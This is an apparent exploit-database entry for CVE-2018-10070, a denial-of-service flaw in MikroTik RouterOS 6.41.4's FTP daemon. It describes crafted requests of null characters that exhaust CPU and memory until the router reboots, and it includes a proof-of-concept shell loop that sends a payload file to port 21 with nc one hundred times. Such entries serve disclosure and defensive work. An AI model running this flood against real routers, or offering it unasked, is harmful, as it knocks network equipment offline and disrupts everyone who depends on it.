MikroTik 6.41.4 Denial of service FTP daemon crash

vendor:

RouterOS

by:

Hosein Askari (FarazPajohan)

N/A

CVSS

HIGH

Denial of service

400

CWE

Product Name: RouterOS

Affected Version From: All Version

Affected Version To: 6.41.4

Patch Exists: NO

Related CWE: CVE-2018-10070

CPE: o:mikrotik:routeros:6.41.4

Metasploit:

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=131846

Platforms Tested:

2018

MikroTik 6.41.4 Denial of service FTP daemon crash

A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '' characters, preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.

Mitigation:

Unknown

Source

Exploit-DB raw data:

################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################

for i in `seq 1 100`

do
  cat craft |  nc -nv <MikroTik IP> 21 &
  sleep 2
done